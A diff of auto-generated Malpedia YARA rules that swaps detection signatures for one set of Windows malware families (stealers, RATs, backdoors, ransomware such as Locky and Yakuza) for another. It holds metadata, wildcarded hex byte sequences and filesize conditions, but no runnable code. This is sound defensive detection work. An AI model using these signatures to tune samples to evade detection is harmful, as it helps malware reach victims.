 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.knot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.knot_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.saigon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.saigon_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "735c3c37008eab248d62841c5d72cf7bb3dbc84598bc674db47efd96b8fa6a3a"
+		logic_hash = "c3b4f453a06699b81b34d66487fc346a283825480563ae11e28741d2bf0a0cba"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130828,32 +131302,32 @@ rule MALPEDIA_Win_Knot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c408 85c0 7407 c685f3fdffff00 ebbe }
-		$sequence_1 = { 32c0 e9???????? 8b4508 50 68???????? 8d8de0fdffff 51 }
-		$sequence_2 = { 50 e8???????? 83c408 68???????? 8b8d74f7ffff }
-		$sequence_3 = { 51 8b95ecfdffff 52 8b45fc 50 }
-		$sequence_4 = { 8b148d58504000 52 8b8598fbffff 50 e8???????? 83c408 85c0 }
-		$sequence_5 = { 6a00 6a00 6a00 6a02 6a00 8b55e8 52 }
-		$sequence_6 = { 747b 6a00 6a00 6a00 }
-		$sequence_7 = { e9???????? 8d95f4fdffff 52 8d8580f7ffff }
-		$sequence_8 = { 7507 32c0 e9???????? c785d8fdffff00000000 8d85d8fdffff 50 6a00 }
-		$sequence_9 = { 6880000000 6a02 6a00 6a00 6800000040 8d95e0fdffff 52 }
+		$sequence_0 = { 488be9 215c2460 ff15???????? 4c8d4c2460 8bf0 4533c0 488bcd }
+		$sequence_1 = { 41b800800000 488bcf ff15???????? eb08 ff15???????? 8bd8 }
+		$sequence_2 = { e8???????? 488d8c24b0040000 4c8bc3 33d2 }
+		$sequence_3 = { 4533db e9???????? 33c0 4c8d4c2450 }
+		$sequence_4 = { ff15???????? 33db 483beb 7412 }
+		$sequence_5 = { 33d2 ff15???????? eb03 418bdf 448b8c24e0000000 488bbc24e0000000 }
+		$sequence_6 = { 33d2 8bd8 ff15???????? eb0f bb08000000 }
+		$sequence_7 = { 4c8bc3 33d2 e8???????? 488d8c24c0000000 }
+		$sequence_8 = { 488d542468 4889442468 488b05???????? 418d4802 41b9e0930400 4889442470 ff15???????? }
+		$sequence_9 = { 4183cfff 483bce 7439 33d2 }
 
 	condition:
-		7 of them and filesize < 59392
+		7 of them and filesize < 147456
 }
-rule MALPEDIA_Win_Crat_Auto : FILE
+rule MALPEDIA_Win_Unidentified_023_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "02c75bda-cef6-5d61-9783-dd39d3c8cee4"
+		id = "f77c5286-0b1f-561f-8f58-a27a0408436a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.crat_auto.yar#L1-L181"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_023"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_023_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "723ada0a4601efb2490dd7b222473b1f376d5e93aa2040691bdff635e0b77048"
+		logic_hash = "1eec10f2afa6bd7e6a1d69558f2f25a771bedb385bd839fc0b4d5b578eec4086"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130867,40 +131341,32 @@ rule MALPEDIA_Win_Crat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 488bd0 488d4d90 e8???????? 90 488bd0 }
-		$sequence_1 = { e8???????? 488bd0 488d8d60010000 e8???????? 90 }
-		$sequence_2 = { e8???????? 488bd0 488d8db8000000 e8???????? 90 }
-		$sequence_3 = { e8???????? 488bc8 4885c0 7433 }
-		$sequence_4 = { e8???????? 488bd0 488d8d78010000 e8???????? 90 }
-		$sequence_5 = { e8???????? 488bd0 488d8d70010000 e8???????? 90 }
-		$sequence_6 = { 498bc4 48833d????????10 480f4305???????? 482bc8 }
-		$sequence_7 = { 483bc8 7406 e8???????? 90 488b542420 4883c2e8 }
-		$sequence_8 = { 33d2 c1e902 f7f1 eb02 }
-		$sequence_9 = { ffd0 85c0 750f ff15???????? }
-		$sequence_10 = { 8d7118 57 83f810 7d08 51 }
-		$sequence_11 = { 8b45cc 8b4db0 c740180d000000 89481c 83781800 0f85fd000000 807de100 }
-		$sequence_12 = { 8b4310 46 2b430c 8975e0 83f801 7d08 51 }
-		$sequence_13 = { e8???????? ffd0 8bf0 eb02 }
-		$sequence_14 = { 8b5508 0f57c0 56 8b750c b896000000 f30f7f01 8911 }
-		$sequence_15 = { 8b45cc 8b4db0 c7401810000000 89481c }
-		$sequence_16 = { 8b5508 56 8b0a 8b7204 }
-		$sequence_17 = { 8b30 8955d8 8955e4 46 c745fc00000000 8bdf 8975e0 }
+		$sequence_0 = { 68???????? ff15???????? 3bf4 e8???????? b801000000 52 }
+		$sequence_1 = { 894df4 8a15???????? 8855f8 837d0c01 7514 8bf4 68???????? }
+		$sequence_2 = { 8855f8 837d0c01 7514 8bf4 }
+		$sequence_3 = { 8945f0 8b0d???????? 894df4 8a15???????? 8855f8 837d0c01 }
+		$sequence_4 = { 8855f8 837d0c01 7514 8bf4 68???????? }
+		$sequence_5 = { 68???????? ff15???????? 3bf4 e8???????? b801000000 52 8bcd }
+		$sequence_6 = { 0909 0909 0407 0807 8d4900 4f }
+		$sequence_7 = { 8a15???????? 8855f8 837d0c01 7514 8bf4 }
+		$sequence_8 = { 8945f0 8b0d???????? 894df4 8a15???????? 8855f8 837d0c01 7514 }
+		$sequence_9 = { 7514 8bf4 68???????? ff15???????? 3bf4 e8???????? b801000000 }
 
 	condition:
-		7 of them and filesize < 4161536
+		7 of them and filesize < 1433600
 }
-rule MALPEDIA_Win_Vskimmer_Auto : FILE
+rule MALPEDIA_Win_Covid22_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "60bc81a1-a857-5ddb-833d-12c04ee64d84"
+		id = "99a02a74-d0a3-533c-b448-35480cff51fc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vskimmer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vskimmer_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.covid22"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.covid22_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "3a5deb80227e8fbb07640a24d78b7397cb1bc684cae3032e29532961361bc773"
+		logic_hash = "968cf98e2e8c36cdb3ce45b1a5e5186c5425f3f25bc15cd333cdcc77eeba73ef"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130914,32 +131380,32 @@ rule MALPEDIA_Win_Vskimmer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c0 8b8dbcfdffff 6bc009 0fb6840808e64100 6a08 c1e804 5e }
-		$sequence_1 = { ff15???????? 53 8d85ecfbffff 50 68???????? 8d85f8feffff }
-		$sequence_2 = { 8d85b0fdffff 57 50 e8???????? 8d85a4faffff }
-		$sequence_3 = { ff75e8 8b4c3038 e8???????? 83f8ff 7506 834dec04 eba0 }
-		$sequence_4 = { e8???????? ff7508 8b10 8bc8 ff5208 8b4e10 884508 }
-		$sequence_5 = { 3bc6 751c 85c9 7508 c70703000000 eb37 }
-		$sequence_6 = { 6a01 8d8dc8fcffff e8???????? e8???????? c3 6a08 }
-		$sequence_7 = { 7508 c70703000000 eb37 83f901 }
-		$sequence_8 = { 75da 8b4508 8b4d10 8908 e9???????? 55 }
-		$sequence_9 = { 8d858cf7ffff 8bcc 89a5c0f6ffff 50 e8???????? }
+		$sequence_0 = { 8a4d78 83c40c f6c102 8975dc 897d08 }
+		$sequence_1 = { 57 e8???????? 8d7438ff 3bf7 }
+		$sequence_2 = { 8b3d???????? ffd7 8b4608 85c0 7403 50 ffd7 }
+		$sequence_3 = { 33d9 81e3ff000000 c1e908 330c9df0904000 0fb65801 }
+		$sequence_4 = { 89c3 83fb01 7532 ff35???????? }
+		$sequence_5 = { e8???????? 8d0df4b14000 5a e8???????? 8b442414 e8???????? 50 }
+		$sequence_6 = { 83c001 8bce c1e908 330c9df0904000 0fb618 33d9 }
+		$sequence_7 = { 8d0d14b24000 e8???????? ba???????? 8d0d18b24000 e8???????? ba???????? }
+		$sequence_8 = { c705????????0a4c4000 c705????????304c4000 c705????????01000000 837d1c00 7507 c7451c00904000 }
+		$sequence_9 = { ba???????? 8d0d10b24000 e8???????? ba???????? 8d0d14b24000 }
 
 	condition:
-		7 of them and filesize < 376832
+		7 of them and filesize < 1955840
 }
-rule MALPEDIA_Win_Ldr4_Auto : FILE
+rule MALPEDIA_Win_Lemonduck_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e9bf8314-609f-5a98-b31a-45503c13f904"
+		id = "79120d9c-8a0d-5155-9a06-2a2421d4dbd2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ldr4"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ldr4_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lemonduck"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lemonduck_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "53ff90205c01818bf39f4f2440172f0cbaed0a0fe830aff04c528ba3bd5f6dab"
+		logic_hash = "54774a4a200c3b8a4ce7eb935c4745902b9f773eeb8d215043530b937c7a7753"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130953,32 +131419,32 @@ rule MALPEDIA_Win_Ldr4_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 7407 50 ff15???????? 53 55 57 }
-		$sequence_1 = { e8???????? 8bfb 85db 0f855d020000 8d44242c 50 e8???????? }
-		$sequence_2 = { 8b7368 57 85f6 7437 83c350 }
-		$sequence_3 = { a1???????? 8b4008 53 56 8b35???????? 57 6a11 }
-		$sequence_4 = { 57 33c0 e8???????? 894508 83c324 83c8ff f00fc103 }
-		$sequence_5 = { 83c40c ff75f4 ffd3 8b4674 3945fc 7203 8945fc }
-		$sequence_6 = { 0bf2 687caaf6db 8b450c 8b4810 e8???????? 85c0 }
-		$sequence_7 = { 683799f0e7 c74514a00a0000 e8???????? 3bc7 740d 6a04 8d4d14 }
-		$sequence_8 = { 57 8bce e8???????? 85c0 750a 8b4e28 8b5510 }
-		$sequence_9 = { 50 ff75f8 e8???????? ff75f8 894508 6a00 56 }
+		$sequence_0 = { e8???????? 4c8d65c0 4c89642440 8918 33c0 89442434 eb02 }
+		$sequence_1 = { 90 33c9 48894dd0 48894dd8 41bf05040000 6644897dde 488b4dd8 }
+		$sequence_2 = { eb03 0f57c9 488b05???????? f20f110d???????? 4885c0 7422 488d157ddf0000 }
+		$sequence_3 = { ffe0 488d0503f60a00 c3 488d05e3f50a00 c3 488d05c3f50a00 c3 }
+		$sequence_4 = { b83f000000 e9???????? 4898 498b0cc7 48890d???????? 488d153f9d1500 c744242000000000 }
+		$sequence_5 = { f30f6f4ff0 4c8d4d90 4889442440 4c8d4580 660fefc2 488d442450 660fefcb }
+		$sequence_6 = { e8???????? 90 e8???????? 90 e8???????? cc 4c8bdc }
+		$sequence_7 = { e8???????? 488b8fb8000000 e8???????? 488b8fc0000000 e8???????? 488b8fc8000000 e8???????? }
+		$sequence_8 = { 66410fefc9 f3430f7f0c2a 660f6f4590 660f38dc442440 660f7f4590 66410fefc2 f30f7f00 }
+		$sequence_9 = { eb22 488d1d912c1400 eb19 488d1d702c1400 eb10 488d1d9f2c1400 eb07 }
 
 	condition:
-		7 of them and filesize < 117760
+		7 of them and filesize < 10011648
 }
-rule MALPEDIA_Win_Terminator_Rat_Auto : FILE
+rule MALPEDIA_Win_Yakuza_Ransomware_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e470c3b5-74cd-53c3-b4cc-acdce03aa8dd"
+		id = "73df97f0-7e35-550b-9535-694c3981ecc9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.terminator_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.terminator_rat_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yakuza_ransomware"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.yakuza_ransomware_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "0c5a38ab087b1b21acdc43ba4e7c8b1be9b6d593b69dd3e7b8053959b3c291c4"
+		logic_hash = "877a27b3e7b369865a3e2e4c6ef5b4324a9318b7d81e28cbd514c89eb464d3c0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130992,32 +131458,32 @@ rule MALPEDIA_Win_Terminator_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 8d8700fcffff 56 50 }
-		$sequence_1 = { 8913 83c304 49 75f3 }
-		$sequence_2 = { c0c803 3441 c0c803 aa e2e3 }
-		$sequence_3 = { 50 e8???????? 8b852d010000 8b4804 }
-		$sequence_4 = { ffb7f0fbffff 50 e8???????? 8b4604 8987fcfbffff 8d87f8fbffff 50 }
-		$sequence_5 = { 58 7506 898529010000 81c400040000 5f c3 }
-		$sequence_6 = { 56 ff5565 85c0 7403 894569 61 }
-		$sequence_7 = { c7001a010000 e8???????? 83f8ff 7405 6a01 }
-		$sequence_8 = { 5d 55 57 8bc7 83c004 837d0400 7413 }
-		$sequence_9 = { 8bfc 83ec0c 53 56 8b7708 ff77fc ffb51d010000 }
+		$sequence_0 = { 894da4 3bc8 0f8e1f010000 68e8030000 ffd2 47 897da0 }
+		$sequence_1 = { 8bce e8???????? 85c0 0f84e6000000 83f802 0f8417010000 f7464000080000 }
+		$sequence_2 = { 744d 6afd 8d4da8 e8???????? 8b4508 8bcf 83c00c }
+		$sequence_3 = { eb41 8bc2 bafeffff7f 83c807 3dfeffff7f 0f47c2 8945a0 }
+		$sequence_4 = { 8b01 0f84d6000000 57 ff5044 50 8d4ddc e8???????? }
+		$sequence_5 = { e8???????? 8907 894704 897df0 8d04f0 894708 c745fc00000000 }
+		$sequence_6 = { 6a02 8bce e8???????? 8bf0 6a00 8b8dd4f1ffff e8???????? }
+		$sequence_7 = { e9???????? 83e92c e9???????? 2b49fc 81e910010000 e9???????? 2b49fc }
+		$sequence_8 = { c3 8b4de8 e9???????? 8b4de8 e9???????? 8d4de8 e9???????? }
+		$sequence_9 = { f00fc14120 7523 8bb55cffffff 0f1f4000 85f6 7415 8bce }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 2811904
 }
-rule MALPEDIA_Win_Webc2_Bolid_Auto : FILE
+rule MALPEDIA_Win_Karma_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dd418f60-6f65-5186-bdc9-d3ec62c1747f"
+		id = "dbba8d60-5e3c-5b62-b524-df57562af200"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_bolid"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_bolid_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.karma"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.karma_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "d5bb74d5c966a3742a98e85309bd13720d314db10e6aa05f8d544024f31adb6b"
+		logic_hash = "3819fc1d726604395f257c41732abcfd39c86d6c5f38e2d6dd6e88cb0f6eea5a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131031,32 +131497,32 @@ rule MALPEDIA_Win_Webc2_Bolid_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 897344 8b3d???????? 33c0 897dec 6a01 f2ae f7d1 }
-		$sequence_1 = { f3a5 8bca 83e103 f3a4 8b4dbc }
-		$sequence_2 = { 8a4c2413 53 884c2460 8d4c2460 c684240002000001 }
-		$sequence_3 = { 8d4c2404 e8???????? 8d4c2404 c784242803000000000000 e8???????? }
-		$sequence_4 = { 57 897de8 e8???????? 84c0 7427 }
-		$sequence_5 = { 8b4dec 8b75e4 03c1 894508 }
-		$sequence_6 = { 03c1 c60000 8b4dbc c645fc00 85c9 7422 }
-		$sequence_7 = { 8b6c2414 03c2 8a4d00 8a18 }
-		$sequence_8 = { eb22 85f6 741c 8a46ff }
-		$sequence_9 = { c68424240200000d e8???????? 83ec10 8d9424a0000000 8bcc 89a424c4000000 52 }
+		$sequence_0 = { 33f6 0fb74102 83c102 8bd0 6685c0 75da }
+		$sequence_1 = { c745dc33000000 c745e032000000 c745e42d000000 c745e862000000 c745ec79000000 c745f074000000 }
+		$sequence_2 = { 0fb7040a 8d4902 668901 6685c0 75f1 8d8df4fdffff }
+		$sequence_3 = { 8d55b8 50 8bca e8???????? 8d45b8 }
+		$sequence_4 = { 85c0 750c 68???????? ffd6 a3???????? 8b15???????? 85d2 }
+		$sequence_5 = { 8b4c2438 e8???????? 83c410 6a00 6a00 }
+		$sequence_6 = { 750d 83e820 8bc8 85c0 7fed 85c9 }
+		$sequence_7 = { 0f1f00 8d4341 c745fa3a005c00 668945f8 33c0 668945fe 8d45f8 }
+		$sequence_8 = { 750c 40 83f808 72f4 0f84b0000000 56 8bd6 }
+		$sequence_9 = { 7f0c 8b442418 3bf8 0f8224ffffff 8b7c2410 ff742434 6a00 }
 
 	condition:
-		7 of them and filesize < 163840
+		7 of them and filesize < 49208
 }
-rule MALPEDIA_Win_Deltastealer_Auto : FILE
+rule MALPEDIA_Win_Evilpony_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ae1ce1b2-5800-51da-891a-7d0ee714cc8c"
+		id = "c9372a6e-35c7-52f6-9c3d-299228c095b1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltastealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.deltastealer_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.evilpony_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "7a995bc7de4a09d620f7c56a219adce0b4fee73dcf5dde633c44a4fcc3f98e63"
+		logic_hash = "ffd9f8ba97fbd907290551898893cb44ef48c12bf2cd21edd5aa01ba36ae5a3e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131070,34 +131536,34 @@ rule MALPEDIA_Win_Deltastealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7317 eb5f 660f6f07 660fd7c0 f7d0 4881c600fdffff 4883c710 }
-		$sequence_1 = { 488d442438 488910 4c8d4c2440 498901 4d897108 488b4e38 488b5650 }
-		$sequence_2 = { 89d5 4889ce 488b09 488b4608 ba27000000 ff5020 40b701 }
-		$sequence_3 = { 5e 415c 415e 415f c3 0fb611 4883fa05 }
-		$sequence_4 = { 4989d8 e8???????? 4801df 4929dd 4939dd 73e6 eb82 }
-		$sequence_5 = { e9???????? 488b442420 48c70002000000 eb33 488b442420 48c70001000000 }
-		$sequence_6 = { 488d42f0 482301 4c8b4118 45880c10 46884c0010 48ff4110 c3 }
-		$sequence_7 = { 4181fe00001100 b903000000 0f43c8 bb01001100 ba5c000000 488d05c7020000 48630c88 }
-		$sequence_8 = { 48c1ef39 488d43f0 4821c5 41883c1e 42887c3510 eb25 }
-		$sequence_9 = { 4885c0 748a 8a1406 8a1c01 881c06 881401 48ffc0 }
+		$sequence_0 = { 6a04 8d9ddcf7ffff c785dcf7ffff1000efbe e8???????? ffb5f0f7ffff 8bc7 }
+		$sequence_1 = { 85ff 7423 8bc6 e8???????? 56 }
+		$sequence_2 = { 8d8c019979825a c14db002 8bc2 3345e4 894da8 3345cc 3345c4 }
+		$sequence_3 = { 55 8bec 56 6885010000 6a40 ff15???????? 8bf0 }
+		$sequence_4 = { e8???????? 83c414 6a00 6a00 57 56 }
+		$sequence_5 = { ff15???????? 85c0 0f85b0000000 56 57 8b3d???????? 33f6 }
+		$sequence_6 = { 83c410 85ff 7420 688c000000 6a40 ff15???????? }
+		$sequence_7 = { 53 89442438 ff5114 3bf7 7510 }
+		$sequence_8 = { e8???????? 83c40c ff750c 6a1c ff7508 e8???????? 83c40c }
+		$sequence_9 = { 8b55b0 3345d8 2355ac 3345c4 894da8 d1c0 8945e4 }
 
 	condition:
-		7 of them and filesize < 3532800
+		7 of them and filesize < 147456
 }
-rule MALPEDIA_Win_Acbackdoor_Auto : FILE
+rule MALPEDIA_Win_Rdat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4a823252-73f2-58f2-b3ba-b547632b74fc"
+		id = "c05f84d4-de9e-5fb2-ae60-330892f73174"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acbackdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.acbackdoor_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rdat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rdat_auto.yar#L1-L159"
 		license_url = "N/A"
-		logic_hash = "0d2e2199924ba6f861c1f4e0ce544d152ae66498c3d6f8abd97960e9524ddf95"
-		score = 75
-		quality = 75
+		logic_hash = "2e9377d4369bfead5bccbe7fe48c6c763a624a3a6df0438cb4949c8e1a10afb4"
+		score = 60
+		quality = 45
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -131109,32 +131575,38 @@ rule MALPEDIA_Win_Acbackdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 85c0 7428 c744240440000000 892c24 8944241c e8???????? }
-		$sequence_1 = { c744240c01090000 c7442408???????? c744240401000000 891c24 e8???????? e9???????? c7442410b3904a00 }
-		$sequence_2 = { c78424c40000008c68059b c78424c80000006bbd41fb c78424cc000000abd9831f c78424d000000079217e13 c78424d400000019cde05b 89842458010000 83fb02 }
-		$sequence_3 = { e8???????? 85c0 0f848d000000 89c6 83c414 89f0 5b }
-		$sequence_4 = { e9???????? 8b95fc0d0000 8b85f80d0000 89542444 83c201 89442440 0f840f050000 }
-		$sequence_5 = { 89c7 8b442414 c744240440000000 890424 e8???????? 83c46c 89f8 }
-		$sequence_6 = { 89d6 c1ee19 8b0c8da0d64a00 c1e305 83e60f c1e104 0b0cb5a0d64a00 }
-		$sequence_7 = { 89742460 89542464 e9???????? c744242009000000 bd10000000 bb08000000 c744241403000000 }
-		$sequence_8 = { 8d7904 c70100000000 31c0 83e7fc c74411fc00000000 29f9 01d1 }
-		$sequence_9 = { 8b442424 39d8 0f8784080000 8d7e04 29c3 39fb 0f8277080000 }
+		$sequence_0 = { 4c8bc3 4c0f42c7 4d85c0 7504 }
+		$sequence_1 = { 4c8b4548 4d85c0 0f84db000000 4885c0 0f84d2000000 }
+		$sequence_2 = { 4898 4885c0 751e 483bfb }
+		$sequence_3 = { 498b4638 498b1c04 4885db 0f843f010000 }
+		$sequence_4 = { 4863ca 418907 33c0 448b5770 }
+		$sequence_5 = { 25ffffff0f 743d 83e801 7427 }
+		$sequence_6 = { 4883cbff 6690 48ffc3 4038341a 75f7 4883791810 488b7910 }
+		$sequence_7 = { 48895808 48896810 48897018 488bf2 4c8bf9 }
+		$sequence_8 = { 75f7 4883791810 488b7910 7203 488b09 483bfb 4c8bc3 }
+		$sequence_9 = { 4e8b44c8f8 7816 8d4a01 4d8b4008 }
+		$sequence_10 = { 85c0 740b b9e8030000 ff15???????? }
+		$sequence_11 = { 25ffffff0f 4c8bc1 83f803 0f85b2000000 488b01 }
+		$sequence_12 = { 4883c504 453bc4 7358 e9???????? }
+		$sequence_13 = { 746c 4883ff01 7266 498bde 48833d????????10 480f431d???????? }
+		$sequence_14 = { 488d0cc0 4863c2 4803c8 420fb6940980360200 }
+		$sequence_15 = { 488d95e8010000 488d8d68010000 e8???????? 90 488d9568010000 4883bd8001000010 }
 
 	condition:
-		7 of them and filesize < 1704960
+		7 of them and filesize < 1573888
 }
-rule MALPEDIA_Win_Locky_Auto : FILE
+rule MALPEDIA_Win_Cryptoluck_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9434ac8a-f19d-5097-9718-4e0bcd7c3bb7"
+		id = "c54fc8ef-3602-58f8-83b4-8208d9ae15d7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.locky_auto.yar#L1-L181"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoluck"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cryptoluck_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "cfd0780ce81a27b30c6ff7ba29e871c926663b6bd8e9b266836319c43aec3bb1"
+		logic_hash = "0975548068cce5a595ab873e8bd23c5fffef61084104837a0ebc0f80661af758"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131148,39 +131620,32 @@ rule MALPEDIA_Win_Locky_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 51 8b00 6a00 8d4d0c 51 ff750c }
-		$sequence_1 = { 760a 68???????? e8???????? a1???????? 2b05???????? 6a1c }
-		$sequence_2 = { 50 c745f8???????? e8???????? 8d85f0fdffff 50 }
-		$sequence_3 = { 99 83e207 8d3c02 33d2 42 c1ff03 663bca }
-		$sequence_4 = { 99 5e f7fe 8bf0 81fe48922409 760a 68???????? }
-		$sequence_5 = { 6a00 ff15???????? 85c0 751e ff15???????? c745f8???????? }
-		$sequence_6 = { 8907 8bc7 c9 c20400 ff15???????? 8945fc }
-		$sequence_7 = { 7314 8b4e1c 8b431c 3bc8 7c0a }
-		$sequence_8 = { 5b c21000 e9???????? 8bff 55 8bec 56 }
-		$sequence_9 = { 03d8 8b442408 f7e1 03d3 5b c21000 e9???????? }
-		$sequence_10 = { 66ab e9???????? 8d12 e9???????? }
-		$sequence_11 = { ebcf 90 8d36 90 }
-		$sequence_12 = { 5e c21000 8bff 55 8bec 33c0 8b4d08 }
-		$sequence_13 = { 6a61 e9???????? 90 58 }
-		$sequence_14 = { 6a63 e9???????? 90 8d36 }
-		$sequence_15 = { 66ab e9???????? 58 90 e9???????? 90 }
-		$sequence_16 = { 66ab 90 e9???????? 8d00 }
+		$sequence_0 = { 83bd3cefffff00 7429 8b8544efffff c60000 8b8d44efffff 83c101 }
+		$sequence_1 = { 8b4df8 894de4 8b55fc 8955e8 837de400 }
+		$sequence_2 = { 8b4dec 83c101 894dec 833d????????00 740e 33d2 }
+		$sequence_3 = { 8d55d8 52 6a00 6819000200 }
+		$sequence_4 = { 8945f8 837df800 0f84d3000000 8b55f8 }
+		$sequence_5 = { ff15???????? b801000000 e9???????? 8d4dd8 51 }
+		$sequence_6 = { c1ea03 83ea0b 8b4514 8910 c745f801000000 eb0c }
+		$sequence_7 = { eb02 eb0a 837df400 0f848bfeffff 8b5518 8b45f8 }
+		$sequence_8 = { c785acf6ffff00000000 8d85acf6ffff 50 8d8da4f6ffff 51 8d95a0f6ffff }
+		$sequence_9 = { 8bec 83ec3c 8b4508 a3???????? 8b4d0c }
 
 	condition:
-		7 of them and filesize < 1122304
+		7 of them and filesize < 229376
 }
